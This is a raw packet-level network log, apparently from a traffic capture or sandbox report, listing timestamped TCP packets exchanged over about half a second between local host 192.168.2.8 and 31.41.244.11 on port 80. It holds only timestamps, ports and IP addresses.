Dec 18, 2024 13:38:37.655952930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.657434940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.657449007 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.657489061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.657522917 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.658677101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.658691883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.658703089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.658729076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.658747911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.660240889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.660253048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.660299063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.661451101 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.661463976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.661509991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.663063049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.663075924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.663197994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.664414883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.664465904 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.665688038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.665704012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.665744066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.665774107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.667118073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.667131901 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.667144060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.667172909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.667193890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.668771982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.668785095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.668850899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.668888092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.670155048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.670167923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.670308113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.671511889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.671525002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.671556950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.671581030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.672436953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.672450066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.672460079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.672483921 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.672511101 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.674026966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.674082041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.674165964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.674226999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.675173044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.675187111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.675220966 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.675262928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.676676035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.676690102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.676729918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.677906990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.677920103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.677954912 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.677972078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.679270983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.679284096 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.679296017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.679316044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.679326057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.679347992 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.680877924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.680891991 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.680919886 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.680933952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.682307005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.682320118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.682362080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.683660984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.683674097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.683703899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.683717012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.684901953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.684916019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.684927940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.684947014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.684968948 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.687649965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.687669039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.687681913 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.687694073 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.687707901 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.687730074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.689469099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.689521074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.689630985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.689680099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.690777063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.690788984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.690824986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.690835953 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.691080093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.691122055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.691257954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.691304922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.692090988 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.692140102 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.692480087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.692521095 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.693402052 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.693455935 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.693675995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.693689108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.693732023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.693743944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.694778919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.694791079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.694842100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.696168900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.696182013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.696232080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.696264029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.697503090 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.697516918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.697554111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.697567940 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.698323011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.698374987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.824501038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.824634075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.824913979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.824975014 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.825535059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.825588942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.825819016 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.825870037 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.826559067 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.826606989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.827074051 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.827086926 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.827121973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.827143908 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.828325987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.828340054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.828378916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.828397989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.829642057 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.829694986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.830398083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.830450058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.831070900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.831084013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.831120968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.831136942 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.832438946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.832452059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.832494020 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.833590031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.833602905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.833642960 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.835068941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.835079908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.835139990 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.836354017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.836366892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.836426973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.837599039 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.837610960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.837656021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.839118004 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.839131117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.839246988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.840414047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.840429068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.840488911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.841744900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.841758966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.841820955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.843067884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.843080997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.843092918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.843125105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.843147039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.844836950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.844858885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.844902039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.844926119 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.845866919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.845880985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.845925093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.845989943 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.847249031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.847261906 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.847311974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.848624945 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.848638058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.848680019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.848706961 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.850105047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.850117922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.850130081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.850164890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.850193977 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.851300955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.851320028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.851366043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.851378918 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.852698088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.852710962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.852761030 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.854099035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.854113102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.854159117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.855447054 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.855463982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.855477095 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.855508089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.855539083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.856990099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.857007980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.857052088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.857079029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.858220100 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.858232975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.858282089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.859637976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.859652996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.859707117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.861059904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.861074924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.861119986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.862354040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.862369061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.862380981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.862411976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.862431049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.864675999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.864696026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.864756107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.865163088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.865176916 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.865220070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.866544962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.866560936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.866610050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.867846012 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.867858887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.867871046 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.867917061 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.867938042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.869198084 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.869211912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.869262934 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.873132944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873182058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873197079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873209953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873215914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.873255968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.873359919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873409033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.873418093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.873452902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.874736071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.874752998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.874764919 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.874792099 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.874813080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.876074076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.876092911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.876138926 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.877455950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.877479076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.877517939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.877547979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.879090071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.879107952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.879156113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.880475044 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.880491972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.880537033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.881711960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.881726980 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.881740093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.881774902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.881789923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.883400917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.883426905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.883465052 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.883482933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.883716106 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.883764982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.884315968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.884386063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.884814024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.884826899 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.884948969 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.886073112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.886132002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.886687040 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.886701107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.886740923 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.887876034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.887933016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.888511896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.888525009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.888566017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.889781952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.889796019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.889846087 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:37.890913963 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:37.890971899 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.016895056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.017020941 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.017143965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.017203093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.017968893 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.018026114 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.018279076 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.018326998 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.018965960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.018985987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.019031048 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.019052982 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.020349979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.020411968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.020589113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.020642042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.021332026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.021352053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.021395922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.021420956 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.022530079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.022603989 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.023010969 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.023035049 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.023075104 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.023088932 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.024344921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.024370909 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.024406910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.024424076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.025623083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.025645971 CET	80	49715	31.41.244.11	192.168.2.8
